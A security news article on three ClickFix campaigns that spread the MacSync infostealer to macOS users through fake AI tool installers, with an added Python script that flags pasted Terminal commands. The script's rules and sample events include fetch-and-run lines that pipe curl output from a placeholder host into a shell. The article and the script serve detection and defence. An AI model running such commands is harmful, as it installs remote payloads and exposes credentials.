PROBABLYPWNED | Malware | March 17, 2026 | 4 min read

MacSync Stealer Spreads via Fake AI Tool Installers in ClickFix Wave

Three ClickFix campaigns target macOS users with MacSync infostealer disguised as ChatGPT and AI coding tools. Latest variant adds in-memory execution to evade detection.

James Rivera

Security researchers have identified three separate ClickFix campaigns distributing the MacSync infostealer to macOS users, all leveraging the surge in AI tool adoption to social-engineer victims into compromising themselves. The campaigns show clear tactical evolution over the past three months, with the latest variant supporting in-memory payload execution to complicate forensic analysis.

The Hacker News reports that more than 20 distinct malware campaigns have targeted AI and code-generation tools from February through March 2026, with MacSync emerging as a consistent payload across multiple operations.

Three Campaigns, One Objective

The first campaign, observed in November 2025, used Google search ads promoting a fake "ChatGPT Atlas" browser extension. Users clicking the malvertising were directed to a fraudulent download page hosted on Google Sites—a choice that lent the operation unearned legitimacy. Attempting to download the software triggered a ClickFix prompt instructing victims to run a Terminal command, which installed MacSync.

The second wave took a more creative approach. Attackers created shared ChatGPT conversations that appeared to offer legitimate advice about Mac developer tools. These conversations linked to malicious pages mimicking trusted platforms like GitHub. Again, the infection required victims to copy and execute a Terminal command—the signature ClickFix technique.

By February 2026, the operators had refined their approach. The latest MacSync variant supports dynamic AppleScript payloads and executes primarily in memory, leaving minimal disk artifacts. This iteration targeted Belgium, India, and parts of North and South America, suggesting the operators are testing which regional audiences prove most susceptible.

What MacSync Steals

Once installed, MacSync harvests a broad range of sensitive data from compromised Macs:

  • Credentials stored in browsers and password managers
  • Keychain database contents
  • Documents and files matching specific patterns
  • Cryptocurrency wallet seed phrases
  • Session tokens and cookies

The stealer exfiltrates this data to attacker infrastructure before cleaning up traces of its presence. The in-memory execution model in the February variant makes post-incident analysis significantly harder—defenders may find evidence of initial compromise but struggle to determine exactly what was taken.

Why ClickFix Works on macOS

ClickFix attacks exploit a fundamental asymmetry: users are conditioned to trust Terminal commands suggested by seemingly legitimate sources. The technique originated targeting Windows users with PowerShell commands but has proven equally effective on macOS.

We've covered ClickFix campaigns targeting Windows users and tracked the evolution of AuraStealer using similar techniques. What's notable about the MacSync campaigns is how effectively they've adapted the approach to macOS-specific social engineering.

Apple users often believe they're less vulnerable to malware—a perception attackers exploit. The "just paste this in Terminal" prompt feels low-risk to users unfamiliar with what these commands can do. And because the victim initiates the action, automated security tools have limited ability to intervene.

Practical Defenses

Organizations with macOS fleets should consider:

  1. User education focused on Terminal abuse - Users need to understand that Terminal commands from external sources carry the same risk as downloading unknown executables
  2. MDM policies restricting Terminal access - Where feasible, limit which users can execute arbitrary Terminal commands
  3. Endpoint detection for AppleScript abuse - The latest variant's dynamic AppleScript payloads should trigger behavioral alerts
  4. DNS filtering for known malvertising domains - Block connections to infrastructure associated with these campaigns
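
Item 3 above calls for behavioral detection of the ClickFix pattern: a command pasted into Terminal that fetches a remote script and runs it without writing it to disk, or that invokes an inline AppleScript via osascript. The script below is an added example, not code from the article or from any vendor product. It scans process-execution telemetry for those command-line shapes and raises the severity when the parent process is an interactive terminal, since that is what a user-pasted ClickFix command looks like. The key=value line format, the parent-process names and every sample event are constructed assumptions; adapt the parser to whatever your EDR or the macOS unified log actually emits.

```python
"""Flag process launches matching the ClickFix pattern on macOS.

Added example; the event line format (one process-exec event per line,
key=value fields, cmd in double quotes) is an assumption, not a real
product's log format.
"""
import re

# Each rule is (indicator name, regex applied to the full command line).
# These are the shapes that let a pasted one-liner run a payload in memory.
RULES = [
    # curl/wget output piped straight into a shell: nothing touches disk
    ("pipe_to_shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # AppleScript supplied inline on the command line rather than from a file
    ("inline_applescript", re.compile(r"\bosascript\b.*\s-e\s")),
    # base64-decoded one-liners are a common way to hide the real command
    ("base64_decode", re.compile(r"\bbase64\b.*\s(-d|-D|--decode)\b")),
    # eval of a command substitution that downloads content
    ("eval_of_download", re.compile(r"\beval\b.*\$\((curl|wget)\b")),
    # shell reading its script from stdin
    ("shell_from_stdin", re.compile(r"\b(ba|z)?sh\s+-s\b")),
]

# Parent processes that imply a human typed or pasted the command (assumed names).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "Warp"}

# key=value, where value is either a double-quoted string (with \" escapes)
# or a run of non-space characters.
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_event(line):
    """Parse one constructed key=value event line into a dict."""
    fields = {}
    for key, raw in FIELD_RE.findall(line):
        if raw.startswith('"'):
            raw = raw[1:-1].replace('\\"', '"')
        fields[key] = raw
    return fields


def match_rules(cmd):
    """Return the names of all rules the command line matches, in rule order."""
    return [name for name, rx in RULES if rx.search(cmd)]


def assess_event(line):
    """Return an alert dict for a suspicious event, or None if it is benign."""
    ev = parse_event(line)
    hits = match_rules(ev.get("cmd", ""))
    if not hits:
        return None
    # A pasted command in an interactive terminal is the ClickFix signature;
    # the same shape spawned by a build tool or cron is still worth a look.
    interactive = ev.get("parent") in INTERACTIVE_PARENTS
    return {
        "ts": ev.get("ts"),
        "user": ev.get("user"),
        "parent": ev.get("parent"),
        "severity": "high" if interactive else "medium",
        "indicators": hits,
        # With in-memory execution the command line may be the only durable
        # artifact, so keep it verbatim for the responder.
        "cmd": ev.get("cmd", ""),
    }


def scan(lines):
    """Run assess_event over every line and keep only the alerts."""
    return [alert for alert in map(assess_event, lines) if alert]


# Constructed sample telemetry: three ClickFix-style launches from Terminal,
# one benign daemon, one benign curl without a pipe, one suspicious launch
# from a non-interactive parent.
SAMPLE_EVENTS = [
    'ts=2026-02-12T09:14:03Z user=alice parent=Terminal cmd="curl -fsSL https://example.invalid/fix.sh | bash"',
    'ts=2026-02-12T09:15:40Z user=alice parent=Terminal cmd="echo aGVsbG8= | base64 -d | sh"',
    'ts=2026-02-12T09:16:12Z user=alice parent=Terminal cmd="osascript -e \'display dialog ok\'"',
    'ts=2026-02-12T09:20:00Z user=root parent=launchd cmd="/usr/sbin/cupsd -l"',
    'ts=2026-02-12T09:31:27Z user=bob parent=Terminal cmd="curl -sS https://example.invalid/api/health"',
    'ts=2026-02-12T10:02:51Z user=carol parent=Xcode cmd="sh -c \\"curl -s https://example.invalid/s | sh\\""',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['ts']} {alert['user']} "
              f"({alert['parent']}) {alert['indicators']}: {alert['cmd']}")
```

The benign curl without a pipe is deliberately included: a rule that fires on every curl from Terminal would drown the real signal, so the rules key on the combination (download plus shell, decode plus shell, inline osascript) rather than on any single tool. In production, feed the alert the user, parent and full command line as the script does, because with an in-memory payload the pasted command may be all a responder ever gets.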

The AI tool angle is particularly effective right now. Everyone wants access to the latest models, and attackers know it. Employees searching for ChatGPT alternatives, Claude clients, or AI coding assistants represent high-value targets—they're technically sophisticated enough to follow Terminal instructions but may not recognize when those instructions are malicious.

Broader Context

According to Pillar Security, the 20-plus campaigns targeting AI tools since February represent a coordinated exploitation of current technology trends. MacSync is one of several infostealers being distributed this way, but its consistent presence across multiple operations suggests the operators have established reliable distribution partnerships.

For readers looking to protect themselves from various types of malware, the key lesson here is skepticism toward any installation process that requires Terminal commands. Legitimate software distributed through the Mac App Store or reputable developers doesn't require users to paste commands into Terminal. If an installer asks you to do that, something is wrong.
